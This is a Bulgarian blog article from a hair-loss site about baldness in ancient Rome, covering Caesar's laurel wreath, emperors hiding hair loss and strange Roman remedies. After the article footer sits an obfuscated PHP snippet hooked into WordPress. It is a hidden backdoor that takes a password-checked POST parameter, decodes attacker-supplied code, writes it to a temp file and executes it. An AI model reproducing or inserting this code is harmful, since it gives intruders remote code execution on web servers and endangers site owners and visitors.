Плешивостта в Рим означавала липса на мъжество | Косопад

Плешивостта в Рим означавала липса на мъжество

Загубата на коса е процес, който в никоя епоха не е бил гледан с добро око. Много често причините са чисто естетически, но при някои цивилизации имало и допълнителен смисъл. В Древен Рим косата е символизирала мъжественост, смелост и плодовитост. Затова косопадът се възприемал като загуба на тези качества. Затова най- важните личности от тази епоха криели фактът, че оплешивяват.

kosa-rim

Човекът, който олицетворява смисълът на косата в Древен Рим е самият Юлий Цезар. За да не си личи, че е плешив, той помолил Сената да му позволи да носи постоянно лавров венец. Така нямало да си личи, че остава без коса.

Други влиятелни исторически личности от периода като Тиберий и Доминициан също страдали от косопад. Те се опитвали да го скрият като оставяли косата да расте в задната част на главата и я сресвали напред. Също такаkosopad-rim използвали и перуки.

Но римляните не само се опитвали да скрият проблема, но и да намерят разрешение. Медицината по онова време се базирала основно на билки и знанията за свойствата им се предавали от поколения на поколение.

В една от рецептите като основна съставка се ползвала билката laserpicium, която много се използвала в онези векове. Смесвали я с вино, оцет, черен пипер и миши екскременти. Сместа се използвала, за да спре косопада.

Но това далеч не било единственото средство, което използвали римляните. Друга странна рецепта включвала печени мишки, конски зъби, мас от мечка и от елен.

25. април 2014 16:49:57 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}